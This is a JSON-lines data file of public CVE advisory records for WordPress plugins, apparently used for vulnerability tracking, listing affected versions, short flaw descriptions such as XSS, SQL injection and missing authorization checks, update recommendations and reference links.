{"CVE_ID":"CVE-2023-6987","slug":"string-locator","versionImpact":"2.6.5","versionEndExcluding":"2.6.6","description":"The String locator plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'sql-column' parameter in all versions up to, and including, 2.6.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This required WP_DEBUG to be enabled in order to be exploited.","recommendation":"Update to version 2.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18e0140e-ac24-48c6-aea0-bb0da203a817?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/18e0140e-ac24-48c6-aea0-bb0da203a817?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139143\\\/string-locator\\\/tags\\\/2.6.6\\\/includes\\\/Extension\\\/SQL\\\/views\\\/editor\\\/sql.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3139143\\\/string-locator\\\/tags\\\/2.6.6\\\/includes\\\/Extension\\\/SQL\\\/views\\\/editor\\\/sql.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8541","slug":"woo-discount-rules","versionImpact":"2.6.5","versionEndExcluding":"2.6.6","description":"The Discount Rules for WooCommerce \u2013 Create Smart WooCommerce Coupons & Discounts, Bulk Discount, BOGO Coupons plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.6.5. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a site administrator into performing an action such as clicking on a link. Please note that this is only exploitable when the 'Leave a Review' notice is present, which occurs after 100 orders are made and disappears after a user dismisses the notice.","recommendation":"Update to version 2.6.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3529044f-c3d8-4370-8ba5-9df0fb71ab3c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3529044f-c3d8-4370-8ba5-9df0fb71ab3c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149013\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149013\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-discount-rules\\\/tags\\\/2.6.5\\\/v2\\\/App\\\/Views\\\/Admin\\\/review-notice.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-discount-rules\\\/tags\\\/2.6.5\\\/v2\\\/App\\\/Views\\\/Admin\\\/review-notice.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10960","slug":"brizy","versionImpact":"2.6.4","versionEndExcluding":"2.6.5","description":"The Brizy \u2013 Page Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'storeUploads' function in all versions up to, and including, 2.6.4. This makes it possible for authenticated attackers, with Contributor-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 2.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222672\\\/brizy\\\/tags\\\/2.6.5\\\/editor\\\/zip\\\/archiver.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3222672\\\/brizy\\\/tags\\\/2.6.5\\\/editor\\\/zip\\\/archiver.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f0c85f4-07ae-4a2b-bd82-93467e7d9325?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f0c85f4-07ae-4a2b-bd82-93467e7d9325?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3819","slug":"jeg-elementor-kit","versionImpact":"2.6.4","versionEndExcluding":"2.6.5","description":"The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's JKit - Banner widget in all versions up to, and including, 2.6.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46868a11-0c82-4bd3-82b5-9a19a5a0cef1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46868a11-0c82-4bd3-82b5-9a19a5a0cef1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/tags\\\/2.6.4\\\/class\\\/elements\\\/views\\\/class-banner-view.php#L55\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/tags\\\/2.6.4\\\/class\\\/elements\\\/views\\\/class-banner-view.php#L55\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3077328%40jeg-elementor-kit&new=3077328%40jeg-elementor-kit&sfp_email=&sfph_mail=#file565\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3077328%40jeg-elementor-kit&new=3077328%40jeg-elementor-kit&sfp_email=&sfph_mail=#file565\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3161","slug":"jeg-elementor-kit","versionImpact":"2.6.4","versionEndExcluding":"2.6.5","description":"The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the countdown widget's attributes in all versions up to, and including, 2.6.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48a13fb7-bf1a-4bf2-ac3b-3b5a75fec616?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/48a13fb7-bf1a-4bf2-ac3b-3b5a75fec616?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/trunk\\\/assets\\\/js\\\/elements\\\/countdown.js#L93\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/trunk\\\/assets\\\/js\\\/elements\\\/countdown.js#L93\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3077328%40jeg-elementor-kit%2Ftrunk&old=3062484%40jeg-elementor-kit%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3077328%40jeg-elementor-kit%2Ftrunk&old=3062484%40jeg-elementor-kit%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10499","slug":"ai-engine","versionImpact":"2.6.3","versionEndExcluding":"2.6.5","description":"The AI Engine WordPress plugin before 2.6.5 does not sanitize and escape a parameter from one of its REST API endpoints before using it in a SQL statement, allowing admins to perform SQL injection attacks.","recommendation":"Update to version 2.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8606a93a-f61d-40df-a67e-0ac75eeadee8\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8606a93a-f61d-40df-a67e-0ac75eeadee8\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5509","slug":"mystickymenu","versionImpact":"2.6.4","versionEndExcluding":"2.6.5","description":"The myStickymenu WordPress plugin before 2.6.5 does not adequately authorize some ajax calls, allowing any logged-in user to perform the actions.","recommendation":"Update to version 2.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b33c262-e7f0-4310-b26d-4727d7c25c9d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3b33c262-e7f0-4310-b26d-4727d7c25c9d\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0334","slug":"jeg-elementor-kit","versionImpact":"2.6.4","versionEndExcluding":"2.6.5","description":"The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom attribute of a link in several Elementor widgets in all versions up to, and including, 2.6.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/950e9042-1364-4200-8f57-171346075764?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/950e9042-1364-4200-8f57-171346075764?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3077328\\\/jeg-elementor-kit\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3077328\\\/jeg-elementor-kit\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5086","slug":"copy-the-code","versionImpact":"2.6.4","versionEndExcluding":"2.6.5","description":"The Copy Anything to Clipboard plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'copy' shortcode in versions up to, and including, 2.6.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2969441\\\/copy-the-code#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2969441\\\/copy-the-code#file1\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e834a211-ccc8-4a30-a15d-879ba34184e9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e834a211-ccc8-4a30-a15d-879ba34184e9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/copy-the-code\\\/tags\\\/2.6.4\\\/classes\\\/class-copy-the-code-shortcode.php#L83\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/copy-the-code\\\/tags\\\/2.6.4\\\/classes\\\/class-copy-the-code-shortcode.php#L83\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1645","slug":"mollie-forms","versionImpact":"2.6.3","versionEndExcluding":"2.6.4","description":"The Mollie Forms plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the exportRegistrations function in all versions up to, and including, 2.6.3. This makes it possible for authenticated attackers, with subscriber access or higher, to export payment data collected by this plugin.","recommendation":"Update to version 2.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/353c244f-6d5d-47d6-988e-33da722a02f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/353c244f-6d5d-47d6-988e-33da722a02f9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mollie-forms\\\/trunk\\\/classes\\\/Admin.php#L904\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mollie-forms\\\/trunk\\\/classes\\\/Admin.php#L904\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046896\\\/mollie-forms\\\/trunk\\\/classes\\\/Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046896\\\/mollie-forms\\\/trunk\\\/classes\\\/Admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1400","slug":"mollie-forms","versionImpact":"2.6.3","versionEndExcluding":"2.6.4","description":"The Mollie Forms plugin for WordPress is vulnerable to unauthorized post or page duplication due to a missing capability check on the duplicateForm function in all versions up to, and including, 2.6.3. This makes it possible for authenticated attackers, with subscriber access or higher, to duplicate arbitrary posts and pages.","recommendation":"Update to version 2.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43c4ca71-0bf0-4529-97d9-2349f96bbb9e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/43c4ca71-0bf0-4529-97d9-2349f96bbb9e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046896\\\/mollie-forms\\\/trunk\\\/classes\\\/Admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3046896\\\/mollie-forms\\\/trunk\\\/classes\\\/Admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1691","slug":"otter-pro","versionImpact":"2.6.3","versionEndExcluding":"2.6.4","description":"The Otter Blocks \u2013 Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE PRO plugin for WordPress is vulnerable to Stored Cross-Site Scripting via file upload form, which allows SVG uploads, in all versions up to, and including, 2.6.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Note that the patch in 2.6.4 allows SVG uploads but the uploaded SVG files are sanitized.","recommendation":"Update to version 2.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77838bf8-7809-4dd6-87f1-a9bda40275a6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/77838bf8-7809-4dd6-87f1-a9bda40275a6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/store.themeisle.com\\\/?edd_action=view_changelog&name=Otter%20Pro\",\"name\":\"https:\\\/\\\/store.themeisle.com\\\/?edd_action=view_changelog&name=Otter%20Pro\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1684","slug":"otter-pro","versionImpact":"2.6.3","versionEndExcluding":"2.6.4","description":"The Otter Blocks \u2013 Gutenberg Blocks, Page Builder for Gutenberg Editor & FSE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the contact form file field CSS metabox in all versions up to, and including, 2.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/934bf839-152d-4d10-9ac8-c64cf042dc18?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/934bf839-152d-4d10-9ac8-c64cf042dc18?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/store.themeisle.com\\\/?edd_action=view_changelog&name=Otter%20Pro\",\"name\":\"https:\\\/\\\/store.themeisle.com\\\/?edd_action=view_changelog&name=Otter%20Pro\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0428","slug":"mihdan-index-now","versionImpact":"2.6.3","versionEndExcluding":"2.6.4","description":"The Index Now plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.3. This is due to missing or incorrect nonce validation on the 'reset_form' function. This makes it possible for unauthenticated attackers to delete arbitrary site options via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7641d52-e930-4143-9180-2903d018da91?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c7641d52-e930-4143-9180-2903d018da91?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3020958\\\/mihdan-index-now\\\/tags\\\/2.6.4\\\/src\\\/Views\\\/WPOSA.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3020958\\\/mihdan-index-now\\\/tags\\\/2.6.4\\\/src\\\/Views\\\/WPOSA.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4629","slug":"woo-product-slider","versionEndExcluding":"2.6.4","description":"The Product Slider for WooCommerce WordPress plugin before 2.6.4 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cf0a51f9-21d3-4ae8-b7d2-361921038fe8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cf0a51f9-21d3-4ae8-b7d2-361921038fe8\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13393","slug":"video-share-vod","versionImpact":"2.6.31","versionEndExcluding":"2.6.32","description":"The Video Share VOD \u2013 Turnkey Video Site Builder Script plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'videowhisper_videos' shortcode in all versions up to, and including, 2.6.31 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.32, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224274%40video-share-vod&new=3224274%40video-share-vod&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3224274%40video-share-vod&new=3224274%40video-share-vod&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9e85d85-76cd-4606-918b-87f07098c967?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f9e85d85-76cd-4606-918b-87f07098c967?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12449","slug":"video-share-vod","versionImpact":"2.6.30","versionEndExcluding":"2.6.31","description":"The Video Share VOD \u2013 Turnkey Video Site Builder Script plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'videowhisper_player_html' shortcode in all versions up to, and including, 2.6.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.31, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208668\\\/video-share-vod\\\/trunk\\\/video-share-vod.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3208668\\\/video-share-vod\\\/trunk\\\/video-share-vod.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b857e64c-a345-4ed3-b690-5b9d1a0cae15?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b857e64c-a345-4ed3-b690-5b9d1a0cae15?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10098","slug":"apply-online","versionImpact":"2.6.2","versionEndExcluding":"2.6.3","description":"The ApplyOnline WordPress plugin before 2.6.3 does not protect uploaded files during the application process, allowing unauthenticated users to access them and any private information they contain","recommendation":"Update to version 2.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/242dac1f-9a1f-4fde-b8c7-374bd451071d\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/242dac1f-9a1f-4fde-b8c7-374bd451071d\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11104","slug":"sky-elementor-addons","versionImpact":"2.6.2","versionEndExcluding":"2.6.3","description":"The Sky Addons for Elementor (Free Templates Library, Live Copy, Animations, Post Grid, Post Carousel, Particles, Sliders, Chart, Blogs) plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the save_options() function in all versions up to, and including, 2.6.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary options on the WordPress site. Please note this is limited to option values that can be saved as arrays.","recommendation":"Update to version 2.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sky-elementor-addons\\\/tags\\\/2.6.1\\\/includes\\\/admin.php#L1267\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sky-elementor-addons\\\/tags\\\/2.6.1\\\/includes\\\/admin.php#L1267\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sky-elementor-addons\\\/tags\\\/2.6.1\\\/includes\\\/admin.php#L1290\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sky-elementor-addons\\\/tags\\\/2.6.1\\\/includes\\\/admin.php#L1290\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3189030%40sky-elementor-addons&new=3189030%40sky-elementor-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3189030%40sky-elementor-addons&new=3189030%40sky-elementor-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3193495%40sky-elementor-addons&new=3193495%40sky-elementor-addons&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3193495%40sky-elementor-addons&new=3193495%40sky-elementor-addons&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a9810a8-311a-424a-bd64-8d25ee891bb5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a9810a8-311a-424a-bd64-8d25ee891bb5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13724","slug":"wallet-system-for-woocommerce","versionImpact":"2.6.2","versionEndExcluding":"2.6.3","description":"The Wallet System for WooCommerce \u2013 Wallet, Wallet Cashback, Refunds, Partial Payment, Wallet Restriction plugin for WordPress is vulnerable to unauthorized access to functionality in all versions up to, and including, 2.6.2. This makes it possible for unauthenticated attackers to increase their own wallet balance, transfer balances between arbitrary users and initiate transfer requests from other users' wallets.","recommendation":"Update to version 2.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3244479%40wallet-system-for-woocommerce%2Ftrunk&old=3231275%40wallet-system-for-woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3244479%40wallet-system-for-woocommerce%2Ftrunk&old=3231275%40wallet-system-for-woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bda326b0-9049-496a-a600-fa65151ce98f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bda326b0-9049-496a-a600-fa65151ce98f?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2024-13682","slug":"wallet-system-for-woocommerce","versionImpact":"2.6.2","versionEndExcluding":"2.6.3","description":"The Wallet System for WooCommerce \u2013 Wallet, Wallet Cashback, Refunds, Partial Payment, Wallet Restriction plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.2. This is due to missing or incorrect nonce validation in class-wallet-user-table.php. This makes it possible for unauthenticated attackers to modify wallet balances via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 2.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3244479%40wallet-system-for-woocommerce%2Ftrunk&old=3231275%40wallet-system-for-woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3244479%40wallet-system-for-woocommerce%2Ftrunk&old=3231275%40wallet-system-for-woocommerce%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[\"Patch\"]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/779a9f7a-4582-4d5e-bd9a-9ff7f14b452a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/779a9f7a-4582-4d5e-bd9a-9ff7f14b452a?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]}]"}
{"CVE_ID":"CVE-2024-1326","slug":"jeg-elementor-kit","versionImpact":"2.6.2","versionEndExcluding":"2.6.3","description":"The Jeg Elementor Kit plugin for WordPress is vulnerable to Stored Cross-Site Scripting via HTML Tag attributes in all versions up to, and including, 2.6.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d108cb36-c072-483e-9746-15b8e7a880c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d108cb36-c072-483e-9746-15b8e7a880c3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/trunk\\\/class\\\/elements\\\/views\\\/class-post-block-view.php#L375\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/jeg-elementor-kit\\\/trunk\\\/class\\\/elements\\\/views\\\/class-post-block-view.php#L375\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038362%40jeg-elementor-kit&new=3038362%40jeg-elementor-kit&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3038362%40jeg-elementor-kit&new=3038362%40jeg-elementor-kit&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
